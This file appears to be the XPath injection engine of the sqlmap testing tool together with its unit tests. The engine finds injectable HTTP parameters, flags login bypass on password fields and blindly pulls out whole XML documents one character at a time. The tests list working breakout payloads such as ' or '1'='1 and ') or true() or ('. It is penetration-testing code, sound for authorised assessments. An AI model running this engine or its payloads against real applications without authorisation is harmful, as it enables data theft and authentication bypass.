def _makeOracle(place, parameter, template):
    """Build a boolean oracle around a verified true `template` page.

    The returned callable oracle(payload) is True when the response is similar to
    the template. Its attribute extract(payload) is more lenient: it is also True
    when the response is clearly closer to the template than to the false page
    (the page obtained for the random sentinel value). Responses are cached per
    payload; the oracle also exposes .template, .falsePage and .cache."""
    cache = {}

    def request(payload):
        try:
            page = cache[payload]
        except KeyError:
            page = cache[payload] = _send(place, parameter, payload)
        return page

    falsePage = request(SENTINEL)

    def oracle(payload):
        page = request(payload)
        unusable = page is None or _isError(page)
        return (not unusable) and _ratio(template, page) >= UPPER_RATIO_BOUND

    def extract(payload):
        page = request(payload)
        if page is None or _isError(page):
            return False

        trueRatio = _ratio(template, page)
        if trueRatio >= UPPER_RATIO_BOUND:
            # unambiguous match against the template
            return True

        # otherwise require a clear separation from the false page
        # (more than 0.05 difference between the two ratios)
        return (trueRatio - _ratio(falsePage, page)) > 0.05

    oracle.extract = extract
    oracle.template = template
    oracle.falsePage = falsePage
    oracle.cache = cache

    return oracle
# Ordered charset for blind character extraction: letters, digits and a few common
# punctuation characters are probed first, followed by the rest of the printable range.
# Characters that are XPath metacharacters or problematic in URL context are excluded.
_META_ORDS = set(ord(_) for _ in ("'", '"', '[', ']', '<', '>', '&', '/'))
_FREQ = (tuple(xrange(ord('a'), ord('z') + 1)) +
         tuple(xrange(ord('A'), ord('Z') + 1)) +
         tuple(xrange(ord('0'), ord('9') + 1)) +
         tuple(ord(_) for _ in "@._-+ "))

_CHARSET = []
# preferred codepoints first, then every remaining codepoint of the allowed range
for _ in _FREQ + tuple(xrange(XPATH_CHAR_MIN, XPATH_CHAR_MAX + 1)):
    if XPATH_CHAR_MIN <= _ <= XPATH_CHAR_MAX and _ not in _META_ORDS and _ not in _CHARSET:
        _CHARSET.append(_)
def _inferValue(oracle, builder, path, getter, maxLen=XPATH_MAX_LENGTH):
    """Blindly infer a string value at `path`, one character at a time.

    `getter(builder, path, prefix)` must return a payload that is true when the
    target value starts with `prefix`. For every position the charset is probed in
    order and the first accepted character is appended; inference stops when no
    character is accepted or `maxLen` characters have been recovered.

    Values containing inner spaces (e.g. "Luther Blisset") are recovered in full;
    trailing whitespace is stripped once at the end. Characters outside the
    charset end the value at that position.

    Returns the recovered value, or None when nothing (or only whitespace) was
    recovered."""
    value = ""
    probes = 0

    for _ in xrange(maxLen):
        for cp in _CHARSET:
            candidate = value + chr(cp)
            probes += 1
            if oracle.extract(getter(builder, path, candidate)):
                value = candidate
                break
        else:
            # no character of the charset extends the current prefix
            break

    # A space is a legitimate inner character, so it must not terminate the
    # extraction; only trailing padding is dropped from the final result
    value = value.rstrip()

    logger.debug("XPath blind inference: %d probes (length=%d)" % (probes, len(value)))

    return value if value else None
def _inferCount(oracle, builder, path, countFn, maxCount=128):
"""Binary search for a count value using predicate 'count(...)>=N'."""
if not oracle.extract(countFn(builder, path, 1)):
return 0
lo, hi = 1, maxCount
while lo < hi:
mid = (lo + hi + 1) // 2
if oracle.extract(countFn(builder, path, mid)):
lo = mid
else:
hi = mid - 1
return lo
def _walkTree(oracle, builder, path="/*", depth=0):
    """Recursively recover the XML subtree rooted at XPath expression `path`.

    For the node at `path` its name, child count (capped at 32), attribute count
    (capped at 16) and attributes are inferred; text is inferred only for nodes
    without children. Children are addressed as "<path>/*[i]".

    Returns a dict {name, path, children, attributes, text}, or None when the
    depth limit is exceeded or no element name could be inferred."""
    if depth > XPATH_MAX_DEPTH:
        return None

    def byName(b, p, prefix):
        return b.nameStartsWith(p, prefix)

    name = _inferValue(oracle, builder, path, byName)
    if not name:
        return None

    logger.info("discovered element: '%s'" % name)

    childCount = _inferCount(oracle, builder, path, lambda b, p, c: b.childCount(p, c), maxCount=32)
    attrCount = _inferCount(oracle, builder, path, lambda b, p, c: b.attributeCount(p, c), maxCount=16)

    attributes = []
    for position in xrange(1, attrCount + 1):
        def byAttrName(b, p, prefix, idx=position):
            return b.attributeNameStartsWith(p, idx, prefix)

        def byAttrValue(b, p, prefix, idx=position):
            return b.attributeValueStartsWith(p, idx, prefix)

        attrName = _inferValue(oracle, builder, path, byAttrName)
        if not attrName:
            continue

        attrValue = _inferValue(oracle, builder, path, byAttrValue) or ""
        attributes.append({"name": attrName, "value": attrValue})
        logger.info("  attribute: @%s='%s'" % (attrName, attrValue))

    text = None
    children = []

    if childCount == 0:
        # leaf node: its string value is its own text
        text = _inferValue(oracle, builder, path, lambda b, p, prefix: b.textStartsWith(p, prefix))
    else:
        for position in xrange(1, childCount + 1):
            child = _walkTree(oracle, builder, "%s/*[%d]" % (path, position), depth + 1)
            if child:
                children.append(child)

    return {
        "name": name,
        "path": path,
        "children": children,
        "attributes": attributes,
        "text": text,
    }
def _treeToTable(node):
"""Flatten a tree node to (columns, rows) for grid output."""
columns = ["Path", "Element", "Attribute", "Value"]
rows = []
def _flatten(n, depth=0):
path = n["path"]
rows.append([path, n["name"], "", ""])
for attr in n.get("attributes", []):
rows.append([path, n["name"], "@" + attr["name"], attr["value"]])
if n.get("text"):
rows.append([path, n["name"], "text()", n["text"]])
for child in n.get("children", []):
_flatten(child, depth + 1)
_flatten(node)
return columns, [_ for _ in rows if _[3] or _[2] not in ("", "text()")]
def _grid(columns, rows):
    """Render a header and rows as an ASCII table and return it as one string.

    Header and cells are passed through getUnicode(). Each column is as wide as
    its longest entry; rows shorter than the header are padded with empty cells
    and cells beyond the last header column are not rendered."""
    header = [getUnicode(_) for _ in columns]
    body = [[getUnicode(_) for _ in row] for row in rows]
    total = len(header)

    def cell(cells, index):
        # Missing trailing cells are treated as empty
        return cells[index] if index < len(cells) else ""

    widths = [max([len(header[index])] + [len(cell(row, index)) for row in body]) for index in xrange(total)]
    separator = "+-" + "-+-".join("-" * _ for _ in widths) + "-+"

    def line(cells):
        padded = [cell(cells, index).ljust(widths[index]) for index in xrange(total)]
        return "| " + " | ".join(padded) + " |"

    output = [separator, line(header), separator]
    output.extend(line(row) for row in body)
    output.append(separator)

    return "\n".join(output)
def _dumpTable(title, columns, rows):
    """Send a titled grid to the dumper; does nothing when there are no rows."""
    if not rows:
        return

    table = _grid(columns, rows)
    conf.dumper.singleString("%s:\n%s" % (title, table))
def xpathScan():
    """Run the '--xpath' workflow over the request parameters.

    For every tested parameter the parser is probed for a back-end hint and
    _detectBoolean() is asked for a boolean oracle. Parameters with an
    extractable boundary are collected as slots; parameters with a boolean
    difference but no extractable boundary are reported right away as
    detection-only. The first usable slot is then reported and used to walk
    the XML tree, whose flattened content is dumped as a grid.

    Rebinds the module-level SENTINEL to a fresh random string on every call."""
    global SENTINEL

    def report(place, parameter, title, payload):
        # Injection point summary written through the dumper
        conf.dumper.singleString("---\nParameter: %s (%s)\n Type: XPath injection\n Title: %s\n Payload: %s=%s\n---" % (parameter, place, title, parameter, payload))

    SENTINEL = randomStr(length=10, lowercase=True)

    logger.info(
        "'--xpath' is self-contained: it detects XPath injection in HTTP "
        "parameters and walks the reachable XML document tree. SQL enumeration "
        "switches (--banner, --dbs, --tables, --users, --sql-query) are ignored"
    )

    if not conf.paramDict:
        logger.error("no request parameters to test (use --data, GET params, or similar)")
        return

    tested = 0
    found = 0
    slots = []

    for place in XPATH_PLACES:
        if place not in conf.paramDict:
            continue

        for parameter in list(conf.paramDict[place].keys()):
            if conf.testParameter and parameter not in conf.testParameter:
                continue

            tested += 1
            logger.info("testing XPath injection on %s parameter '%s'" % (place, parameter))

            # Phase 1: Probe the XPath parser for a backend hint
            backendHint, _unused = _probeBackendByParserError(place, parameter)
            if backendHint:
                backendHint = _fingerprintByError(backendHint)

            # Phase 2: Establish a boolean oracle (authoritative)
            template, payload, boundary = _detectBoolean(place, parameter)

            if not template:
                if backendHint:
                    logger.info("%s parameter '%s' reaches an XPath parser (back-end: '%s'), but no exploitable boolean oracle was established" % (place, parameter, backendHint))
                continue

            found += 1

            if boundary and boundary.extractable:
                backend = backendHint or "Generic XPath"
                logger.info("%s parameter '%s' is vulnerable to XPath injection (back-end: '%s')" % (place, parameter, backend))
                if conf.beep:
                    beep()
                slots.append(Slot(place=place, parameter=parameter, backend=backend,
                                  oracle=_makeOracle(place, parameter, template),
                                  template=template, payload=payload, boundary=boundary))
                continue

            # Detection-only: boolean differentiation confirmed but no extraction boundary.
            # Report as auth bypass on credential fields; log generically otherwise.
            if _isPasswordParam(parameter):
                title = "XPath auth bypass"
                logger.info("%s parameter '%s' allows XPath auth bypass (boolean differentiation confirmed)" % (place, parameter))
            else:
                title = "XPath boolean-based blind (detection-only)"
                logger.info("%s parameter '%s' is vulnerable to XPath injection (detection-only, back-end: '%s')" % (place, parameter, backendHint or "Generic XPath"))
            if conf.beep:
                beep()
            report(place, parameter, title, payload)

    if not slots:
        if found:
            logger.info("XPath injection confirmed (detection-only, no extractable boundary established)")
            logger.info("XPath scan complete")
        elif tested:
            logger.warning("no parameter appears to be injectable via XPath injection (%d tested)" % tested)
        else:
            logger.warning("no parameters found to test for XPath injection")
        return

    # Select the first oracle-bearing slot with an extractable boundary for tree-walking
    slot = None
    for candidate in slots:
        if candidate.oracle and candidate.boundary and candidate.boundary.extractable:
            slot = candidate
            break

    if not slot:
        logger.info("XPath scan complete")
        return

    original = _originalValue(slot.place, slot.parameter) or "x"

    # OR-style boundaries always-true if the original branch matches, so use a
    # sentinel that is guaranteed not to appear as a field value. AND-style
    # boundaries need the original branch to match; keep the original there.
    base = SENTINEL if " or " in slot.boundary.prefix else original

    builder = _XPathPayloadBuilder(base, slot.boundary)
    oracle = slot.oracle

    # Refine backend fingerprint if generic
    if not slot.backend or slot.backend == "Generic XPath":
        backend = _backendFromError(oracle.template)
        if backend:
            backend = _fingerprintByError(backend)
            if backend:
                logger.info("identified back-end: '%s'" % backend)
                slot = slot._replace(backend=backend)

    report(slot.place, slot.parameter, "XPath boolean-based blind", slot.payload)

    # Blind XML tree-walking (attempted document-root traversal)
    logger.info("walking XML document tree (depth limit: %d)" % XPATH_MAX_DEPTH)
    root = _walkTree(oracle, builder)

    if not root:
        logger.warning(
            "XPath injection is confirmed but the XML tree could not be walked. "
            "This may indicate a restricted XPath context (subtree, scalar, or predicate-only)"
        )
    else:
        columns, rows = _treeToTable(root)
        logger.info("extracted %d node(s) from XML tree" % (len(rows)))
        _dumpTable("XPath: %s parameter '%s' XML tree" % (slot.place, slot.parameter), columns, rows)

    logger.info("XPath scan complete")

407
tests/test_xpath.py Normal file
View file

@ -0,0 +1,407 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org)
See the file 'LICENSE' for copying permission
Offline, deterministic tests for the XPath injection engine. Mock oracles stand in for the
HTTP/lxml layer so detection, fingerprinting, blind inference, payload building, and output
formatting can be exercised without a live target.
"""
import unittest
from _testutils import bootstrap
bootstrap()
import lib.techniques.xpath.inject as xpath
SENTINEL = xpath.SENTINEL
class TestHelpers(unittest.TestCase):
    """Checks for the small helper functions of the XPath module."""

    def test_ratio(self):
        same = xpath._ratio("abc", "abc")
        self.assertGreater(same, 0.9)
        different = xpath._ratio("abc", "xyz")
        self.assertLess(different, 0.5)

    def test_delim(self):
        from lib.core.enums import PLACE

        for place, delimiter in ((PLACE.GET, '&'), (PLACE.COOKIE, ';')):
            self.assertEqual(xpath._delim(place), delimiter)

    def test_is_error(self):
        errorPages = (
            "javax.xml.xpath.XPathExpressionException: error",
            "lxml.etree.XPathEvalError: Invalid expression",
        )
        for page in errorPages:
            self.assertTrue(xpath._isError(page))
        self.assertFalse(xpath._isError("normal page content"))

    def test_backend_from_error(self):
        recognized = (
            "lxml.etree.XPathEvalError: Invalid expression",
            "System.Xml.XPath.XPathException: has an invalid token",
        )
        for page in recognized:
            self.assertIsNotNone(xpath._backendFromError(page))
        self.assertIsNone(xpath._backendFromError("normal page"))

    def test_is_password_param(self):
        for parameter in ("password", "pass"):
            self.assertTrue(xpath._isPasswordParam(parameter))
        self.assertFalse(xpath._isPasswordParam("username"))

    def test_xpath_quote(self):
        expectations = (
            ("hello", "'hello'"),
            ("it's", "\"it's\""),
            ('say "hi"', "'say \"hi\"'"),
        )
        for raw, quoted in expectations:
            self.assertEqual(xpath._xpathQuote(raw), quoted)

        # A value holding both quote characters has to go through concat()
        mixed = xpath._xpathQuote("it's \"great\"")
        self.assertIn("concat", mixed)

    def test_make_payload_with_suffix(self):
        boundary = xpath.Boundary("') or ", " or ('", True)
        payload = xpath._makePayload("x", boundary, "starts-with(name(/*),'d')")
        self.assertEqual(payload, "x') or starts-with(name(/*),'d') or ('")

    def test_make_payload_no_suffix(self):
        boundary = xpath.Boundary("' or ", "", True)
        payload = xpath._makePayload("x", boundary, "1=1")
        self.assertEqual(payload, "x' or 1=1")

    def test_make_payload_with_suffix_only(self):
        boundary = xpath.Boundary("' or ", " and '1'='1", True)
        payload = xpath._makePayload("x", boundary, "1=1")
        self.assertEqual(payload, "x' or 1=1 and '1'='1")
class TestBoundaryTable(unittest.TestCase):
    """Consistency checks on the breakout -> boundary lookup table."""

    def test_all_entries_in_boundary_lookup(self):
        table = xpath._BREAKOUT_BOUNDARY
        for breakout in xpath.XPATH_BREAKOUT_PREFIXES:
            self.assertIn(breakout, table,
                          "Breakout '%s' not found in _BREAKOUT_BOUNDARY" % breakout)

    def test_function_arg_boundaries_are_extractable(self):
        breakouts = ("') or true() or ('", "') or '1'='1' or ('", "') or 1=1 or ('")
        for breakout in breakouts:
            boundary = xpath._BREAKOUT_BOUNDARY[breakout]
            self.assertTrue(boundary.extractable)
            self.assertTrue(len(boundary.prefix) > 0)
            self.assertTrue(len(boundary.suffix) > 0)

    def test_simple_string_boundaries_have_suffix(self):
        breakouts = (
            "' or '1'='1", "' or true() or '", "' or 1=1 or '",
            '" or "1"="1', '" or true() or "',
        )
        for breakout in breakouts:
            boundary = xpath._BREAKOUT_BOUNDARY[breakout]
            if boundary is None:
                continue
            self.assertTrue(boundary.extractable)
            self.assertTrue(len(boundary.suffix) > 0,
                            "Simple string breakout '%s' needs a suffix to absorb the trailing quote" % breakout)

    def test_union_wildcard_is_not_extractable(self):
        boundary = xpath._BREAKOUT_BOUNDARY.get("']|//*|test['")
        self.assertIsNone(boundary, "Union wildcard must not have an extraction boundary")

    def test_numeric_has_leading_space(self):
        for breakout in (" or 1=1", " or true()"):
            self.assertTrue(breakout.startswith(" "),
                            "Numeric breakout '%s' needs leading whitespace" % breakout)
            self.assertTrue(xpath._BREAKOUT_BOUNDARY[breakout].extractable)

    def test_all_extractable_have_prefix(self):
        for breakout, boundary in xpath._BREAKOUT_BOUNDARY.items():
            if boundary is None:
                continue
            self.assertTrue(len(boundary.prefix) > 0,
                            "Extractable boundary for '%s' needs a prefix" % breakout)
class TestPayloadBuilder(unittest.TestCase):
    """Checks the payload text produced by _XPathPayloadBuilder."""

    def setUp(self):
        self.boundary = xpath._BREAKOUT_BOUNDARY["') or true() or ('"]
        self.builder = xpath._XPathPayloadBuilder("x", self.boundary)

    def test_name_starts_with(self):
        payload = self.builder.nameStartsWith("/*", "d")
        for fragment in ("starts-with(name(/*)", "'d'"):
            self.assertIn(fragment, payload)

    def test_name_length(self):
        payload = self.builder.nameLength("/*", 9)
        self.assertIn("string-length(name(/*))=9", payload)

    def test_child_count(self):
        payload = self.builder.childCount("/*", 3)
        self.assertIn("count(/*/*)>=3", payload)

    def test_attribute_count(self):
        payload = self.builder.attributeCount("/*[1]", 2)
        self.assertIn("count(/*[1]/@*)>=2", payload)

    def test_text_starts_with(self):
        payload = self.builder.textStartsWith("/*[1]/*[1]", "lut")
        self.assertIn("starts-with(string(/*[1]/*[1])", payload)

    def test_empty_prefix(self):
        payload = self.builder.nameStartsWith("/*", "")
        self.assertIn("''", payload)

    def test_uses_boundary_not_hardcoded(self):
        payload = self.builder.nameStartsWith("/*", "d")
        self.assertNotIn("contains(username", payload)
        self.assertIn("x') or ", payload)
        self.assertIn(" or ('", payload)

    def test_simple_string_boundary_builder(self):
        boundary = xpath._BREAKOUT_BOUNDARY["' or '1'='1"]
        payload = xpath._XPathPayloadBuilder("x", boundary).nameStartsWith("/*", "d")
        self.assertIn("x' or ", payload)
        self.assertIn(" and '1'='1", payload)
class TestBooleanDetection(unittest.TestCase):
    """Runs _detectBoolean() against stand-ins for xpath._send."""

    def setUp(self):
        # Remember the real sender and put it back once the test is over
        self.original_send = xpath._send
        self.addCleanup(setattr, xpath, "_send", self.original_send)

    def test_false_page_must_be_reproducible(self):
        # True is stable, false changes every time -> no oracle
        falseCalls = [0]

        def unstableFalse(place, parameter, value):
            if "true()" in value:
                return "true-page"
            if "false()" in value:
                falseCalls[0] += 1
                return "false-page-%d" % falseCalls[0]
            return "default"

        xpath._send = unstableFalse
        template, payload, boundary = xpath._detectBoolean("GET", "q")
        self.assertIsNone(template)

    def test_detection_returns_extractable_boundary(self):
        def stablePages(place, parameter, value):
            if "true()" in value:
                return '{"count":7,"entries":[{...}]}'
            if "false()" in value:
                return '{"count":0,"entries":[],"error":null}'
            return "default"

        xpath._send = stablePages
        template, payload, boundary = xpath._detectBoolean("GET", "q")
        self.assertIsNotNone(template)
        self.assertIsNotNone(boundary)
        self.assertTrue(boundary.extractable)
class TestGridAndTable(unittest.TestCase):
    """Smoke tests for the grid renderer and the tree flattener."""

    def test_grid(self):
        rendered = xpath._grid(
            ["Path", "Element", "Value"],
            [["/*", "root", ""], ["/*[1]", "child", "text"]],
        )
        for expected in ("Path", "root"):
            self.assertIn(expected, rendered)

    def test_grid_empty(self):
        rendered = xpath._grid([], [])
        self.assertIn("+", rendered)

    def test_tree_to_table(self):
        user = {
            "name": "user", "path": "/*[1]", "children": [],
            "attributes": [{"name": "id", "value": "1"}], "text": None,
        }
        directory = {
            "name": "directory", "path": "/*",
            "children": [user],
            "attributes": [], "text": None,
        }
        columns, rows = xpath._treeToTable(directory)
        self.assertIn("Path", columns)
        self.assertGreater(len(rows), 0)
class TestExtraction(unittest.TestCase):
    """Drives _inferValue() / _inferCount() with oracles that parse the payload."""

    def test_infer_value_mock(self):
        import re

        expected = "directory"
        pattern = re.compile(r"""starts-with\(name\(/\*\),'([^']*)'\)""")
        boundary = xpath._BREAKOUT_BOUNDARY["') or true() or ('"]
        builder = xpath._XPathPayloadBuilder("x", boundary)

        class MockOracle(object):
            def extract(self, payload):
                # True when the guessed prefix is a prefix of the expected name
                match = pattern.search(payload)
                if not match:
                    return False
                return expected.startswith(match.group(1))

        result = xpath._inferValue(MockOracle(), builder, "/*",
                                   lambda b, p, prefix: b.nameStartsWith(p, prefix),
                                   maxLen=20)
        self.assertEqual(result, expected)

    def test_infer_count(self):
        import re

        expected = 3
        pattern = re.compile(r"count\(/\*/\*\)>=(\d+)")
        boundary = xpath._BREAKOUT_BOUNDARY["') or true() or ('"]
        builder = xpath._XPathPayloadBuilder("x", boundary)

        class MockOracle(object):
            def extract(self, payload):
                # True when the guessed lower bound does not exceed the expected count
                match = pattern.search(payload)
                if not match:
                    return False
                return int(match.group(1)) <= expected

        result = xpath._inferCount(MockOracle(), builder, "/*",
                                   lambda b, p, c: b.childCount(p, c),
                                   maxCount=8)
        self.assertEqual(result, expected)
class TestBackendFingerprint(unittest.TestCase):
    """Checks _backendFromError() against sample parser error pages."""

    def test_lxml(self):
        backend = xpath._backendFromError("lxml.etree.XPathEvalError: Invalid expression")
        self.assertIsNotNone(backend)
        self.assertIn("lxml", backend)

    def test_java_jaxp(self):
        backend = xpath._backendFromError("javax.xml.xpath.XPathExpressionException: A location path was expected")
        self.assertIsNotNone(backend)

    def test_dotnet(self):
        backend = xpath._backendFromError("System.Xml.XPath.XPathException: Expression must evaluate to a node-set")
        self.assertIsNotNone(backend)

    def test_no_error(self):
        backend = xpath._backendFromError("Normal page with user data")
        self.assertIsNone(backend)
# --- Real XPath syntax validation (lxml) ---------------------------------------
# XML fixture the expressions are evaluated against: a <directory> root with two
# <user> elements, each carrying an "id" attribute and a <name> child.
_XML = b"""<?xml version="1.0"?><directory><user id="1"><name>luther</name></user><user id="2"><name>fluffy</name></user></directory>"""
# One XPath expression per injection context, keyed by context name. The single
# "%s" is the slot that _xpath_eval() fills with the payload (template % payload).
_XPATH_TEMPLATES = {
    "function_arg": "//user[contains(name,'%s')]",
    "single_quoted": "//user[name='%s']",
    "double_quoted": '//user[name="%s"]',
    "numeric": "//user[position()=%s]",
    "bare_predicate": "//user[%s]",
}
def _xpath_eval(template, payload):
    """Fill the template with the payload, run it against _XML and return how
    many results the expression produced.

    Raises unittest.SkipTest when lxml cannot be imported."""
    try:
        from lxml import etree
    except ImportError:
        raise unittest.SkipTest("lxml not available")

    document = etree.fromstring(_XML)
    expression = template % payload
    matches = document.xpath(expression)
    return len(matches)
class TestRealXPathSyntax(unittest.TestCase):
    """Verify that detection payloads and extraction predicates are syntactically
    valid XPath and produce the expected boolean results."""

    @staticmethod
    def _count(template, payload):
        """Return the match count of the template filled with the payload."""
        return _xpath_eval(template, payload)

    def _test_family(self, template_key, true_breakout, false_breakout, boundary_key, original="x"):
        """Check one injection context end to end.

        template_key   -- key into _XPATH_TEMPLATES
        true_breakout  -- detection suffix expected to match at least one node
        false_breakout -- detection suffix expected to match no node
        boundary_key   -- key into xpath._BREAKOUT_BOUNDARY
        original       -- value the breakouts are appended to"""
        template = _XPATH_TEMPLATES[template_key]
        boundary = xpath._BREAKOUT_BOUNDARY[boundary_key]
        self.assertIsNotNone(boundary)
        self.assertTrue(boundary.extractable)

        # Detection payloads must be syntactically valid and yield true/false
        truePayload = original + true_breakout
        falsePayload = original + false_breakout
        self.assertGreater(self._count(template, truePayload), 0,
                           "True payload '%s' should match at least one node" % truePayload)
        self.assertEqual(self._count(template, falsePayload), 0,
                         "False payload '%s' should match no nodes" % falsePayload)

        # Extraction predicate must be valid and change the result truthfully.
        # The builder itself is not used further; constructing it only has to succeed.
        xpath._XPathPayloadBuilder(original, boundary)
        truePred = xpath._makePayload(original, boundary, "true()")
        falsePred = xpath._makePayload(original, boundary, "false()")
        self.assertGreater(self._count(template, truePred), 0,
                           "Extraction true predicate must match")
        self.assertEqual(self._count(template, falsePred), 0,
                         "Extraction false predicate must not match")

    def test_function_arg_family(self):
        self._test_family("function_arg",
                          "') or true() or ('", "') and false() and ('",
                          "') or true() or ('")

    def test_single_quoted_family(self):
        self._test_family("single_quoted",
                          "' or '1'='1", "' and '1'='2",
                          "' or '1'='1")

    def test_double_quoted_family(self):
        self._test_family("double_quoted",
                          '" or "1"="1', '" and "1"="2',
                          '" or "1"="1')

    def test_numeric_family(self):
        self._test_family("numeric",
                          " or 1=1", " and 1=2",
                          " or 1=1", original="1")

    def test_bare_predicate_family(self):
        self._test_family("bare_predicate",
                          " or true()", " and false()",
                          " or true()", original="1")

    def test_function_arg_second_variant(self):
        self._test_family("function_arg",
                          "') or '1'='1' or ('", "') and '1'='2' and ('",
                          "') or '1'='1' or ('")

    def test_single_quoted_with_matching_original(self):
        """When the original value matches a record (name='luther'), OR-style
        extraction with 'and' suffix is still decisive because the engine uses
        a non-matching sentinel base for tree-walking."""
        boundary = xpath._BREAKOUT_BOUNDARY["' or '1'='1"]

        # Simulate what xpathScan() does: use a sentinel as base for OR-style
        sentinel = "zzznotpresent"
        # The builder itself is not used further; constructing it only has to succeed
        xpath._XPathPayloadBuilder(sentinel, boundary)
        truePred = xpath._makePayload(sentinel, boundary, "true()")
        falsePred = xpath._makePayload(sentinel, boundary, "false()")

        tpl = _XPATH_TEMPLATES["single_quoted"]
        self.assertGreater(self._count(tpl, truePred), 0,
                           "OR extraction must match with sentinel base + true predicate")
        self.assertEqual(self._count(tpl, falsePred), 0,
                         "OR extraction must not match with sentinel base + false predicate")

    def test_all_extractable_boundaries_have_valid_extraction(self):
        # Match each boundary to an appropriate template and original value.
        _CONTEXT = {
            "') or true() or ('": ("function_arg", "x"),
            "') or '1'='1' or ('": ("function_arg", "x"),
            "') or 1=1 or ('": ("function_arg", "x"),
            '") or true() or ("': ("function_arg", "x"),
            "' or '1'='1": ("single_quoted", "x"),
            "' or true() or '": ("single_quoted", "x"),
            "' or 1=1 or '": ("single_quoted", "x"),
            "' and '1'='1": ("single_quoted", "x"),
            '" or "1"="1': ("double_quoted", "x"),
            '" or true() or "': ("double_quoted", "x"),
            " or 1=1": ("numeric", "999"),
            " or true()": ("bare_predicate", "999"),
        }

        for bk, boundary in xpath._BREAKOUT_BOUNDARY.items():
            if boundary is None or not boundary.extractable:
                continue

            # Boundaries without an explicit context fall back to the function-argument template
            tkey, original = _CONTEXT.get(bk, ("function_arg", "x"))
            template = _XPATH_TEMPLATES[tkey]
            payload = xpath._makePayload(original, boundary, "true()")

            try:
                count = self._count(template, payload)
            except unittest.SkipTest:
                # SkipTest derives from Exception; without this clause a missing
                # lxml would be reported as a failure instead of a skip
                raise
            except Exception as e:
                self.fail("Boundary '%s' in '%s' with orig='%s' invalid: %s\n payload: %s" % (bk, tkey, original, e, payload))

            self.assertIsInstance(count, int,
                                  "Boundary '%s' in '%s' produced no count" % (bk, tkey))